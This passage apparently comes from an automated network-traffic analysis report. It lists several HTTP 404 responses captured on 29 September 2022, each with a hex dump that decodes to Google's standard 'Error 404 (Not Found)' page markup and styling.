74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 